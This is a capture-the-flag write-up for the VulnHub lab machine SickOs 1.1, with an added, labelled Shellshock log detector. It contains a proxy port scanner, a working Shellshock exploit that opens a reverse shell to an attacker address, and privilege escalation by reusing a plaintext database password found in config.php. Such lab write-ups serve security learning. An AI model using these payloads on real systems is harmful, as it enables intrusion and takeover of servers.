NOTES ABOUT SickOs 1.1

[ 2016-01-24 ] [ VulnHub / SickOs 1.1 ]

Status: Rooted
Skills: Port Scanning, Proxy Scanning, ShellShock, Reverse Shell, Sudo
Tools: nmap, squidscan, linuxprivchecker.py

PORT SCANNING

root@kali:~# nmap -v -sS -A -p- 10.17.0.103

Starting Nmap 7.00 ( https://nmap.org ) at 2016-01-24 01:57 ART

[...]

PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   http-proxy Squid http proxy 3.1.19
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:GET
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved

[...]

PORT SCANNING THROUGH PROXY

SCRIPT:
#!/usr/bin/python
import requests

# Every request goes through the Squid proxy found on the target, so the
# proxy connects to 127.0.0.1 on its own side (ports that are closed to the outside)
proxy = { "http": "http://10.17.0.103:3128" }

# "puertos" holds one port number per line
with open("puertos", 'r') as f:
	for n in f:
		try:
			r = requests.get("http://127.0.0.1:" + n.strip(), proxies=proxy, timeout=0.1)
			# Squid answers with its own error page (non-200) when the port is closed
			if r.status_code == 200:
				print("Puerto " + n.strip() + " abierto.")
		except requests.exceptions.Timeout:
			pass

RESULT:
root@kali:~/CTF/sickos# python squidscan
Puerto 22 abierto.
Puerto 80 abierto.
Puerto 3306 abierto.

root@kali:~# nikto --host http://127.0.0.1 -useproxy http://10.17.0.103:3128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          127.0.0.1
+ Target Hostname:    127.0.0.1
+ Target Port:        80
+ Proxy:              10.17.0.103:3128
+ Start Time:         2016-01-24 02:37:04 (GMT-3)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21

[...]

+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).

[...]

+ End Time:           2016-01-24 02:37:34 (GMT-3) (30 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

GETTING IN

SCRIPT: SHELLSHOCK EXPLOIT THROUGH PROXY, REVERSE SHELL
#!/usr/bin/python
import requests

# The CGI script nikto flagged, reached through the Squid proxy on the target
target = "http://127.0.0.1/cgi-bin/status"
proxy = { "http": "http://10.17.0.103:3128" }

# Shellshock: the CGI handler exports the User-Agent header into the environment
# of the bash it spawns, and the vulnerable bash runs what follows the function body
payload = { "user-agent" : "() { :; };/bin/bash -i >& /dev/tcp/10.17.0.30/1234 0>&1" }
requests.get(target, headers=payload, proxies=proxy)

root@kali:~# nc -lvp 1234

root@kali:~# python shellshock.py
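
As an added, defender-side example (not part of the original notes): a small Python checker that scans Apache combined-format access-log lines for the bash function-definition prefix that both Shellshock CVEs listed by nikto rely on, reports the CGI path and header involved, and flags a loopback client address, which is what a request relayed by the box's own Squid looks like to Apache. The log lines are constructed for this example.

```python
import re

# Constructed Apache "combined" access-log lines for this example (not taken
# from the original write-up). Line 2 carries a Shellshock-style function
# definition in the User-Agent header, the field the write-up's exploit used.
SAMPLE_LOG = """\
127.0.0.1 - - [24/Jan/2016:02:37:10 -0300] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Nikto/2.1.6)"
127.0.0.1 - - [24/Jan/2016:02:40:01 -0300] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :; }; /usr/bin/id"
10.17.0.30 - - [24/Jan/2016:02:42:00 -0300] "GET /wolfcms/ HTTP/1.1" 200 6815 "-" "Mozilla/5.0"
"""

# Apache combined format: client ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$'
)

# "() {" is the start of an exported bash function definition; every Shellshock
# payload (CVE-2014-6271 and CVE-2014-6278 alike) has to begin with it.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')


def parse_combined(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(log_text):
    """Return one dict per hit: line number, client, requested path, header that carried it."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        fields = parse_combined(line)
        if fields is None:
            continue
        for header in ("user_agent", "referer"):
            if SHELLSHOCK_RE.search(fields[header]):
                parts = fields["request"].split(" ")
                hits.append({
                    "line": lineno,
                    "client": fields["client"],
                    "path": parts[1] if len(parts) > 1 else fields["request"],
                    "header": header,
                    # A loopback client means a local proxy (Squid here) relayed the
                    # request; the real source has to be read from the proxy's own log.
                    "via_local_proxy": fields["client"] == "127.0.0.1",
                })
    return hits
```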

ELEVATING PRIVILEGES

SCRIPT: linuxprivchecker.py - Security Sift
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================

[*] GETTING BASIC SYSTEM INFO...

[+] Kernel
    Linux version 3.11.0-15-generic (buildd@akateko) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014

[+] Hostname
    SickOs

[+] Operating System
    Ubuntu 12.04.4 LTS \n \l

[*] GETTING NETWORKING INFO...
[*] GETTING FILESYSTEM INFO...
[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[...]
[+] All users
    [...]
    sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
    [...]
	
[+] Current User
    www-data

[+] Current User ID
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...

[+] World Writeable Directories for User/Group 'Root'
    [...]
    drwxrwxrwx 7 root root 4096 Dec  5 06:25 /var/www/wolfcms/wolf
    [...]

[+] World Writable Files
    [...]
    -rwxrwxrwx 1 root root 6815 Dec  5 06:32 /var/www/wolfcms/index.php
    -rwxrwxrwx 1 root root 3058 Dec  5 07:26 /var/www/wolfcms/config.php
    -rwxrwxrwx 1 root root 894 Dec  5 06:15 /var/www/wolfcms/favicon.ico
    -rwxrwxrwx 1 root root 4084 Dec  5 06:15 /var/www/wolfcms/CONTRIBUTING.md
    [...]

[*] ENUMERATING PROCESSES AND APPLICATIONS...
[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...

Finished
=================================================================================================

www-data@SickOs:/var/www/wolfcms$ cat config.php
<?php 

[...]

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

[...]

?>

www-data@SickOs:/$ su sickos
Password: john@123

sickos@SickOs:/$ 

sickos@SickOs:~$ cat .bash_history
sudo su
exit

FLAG:
root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying
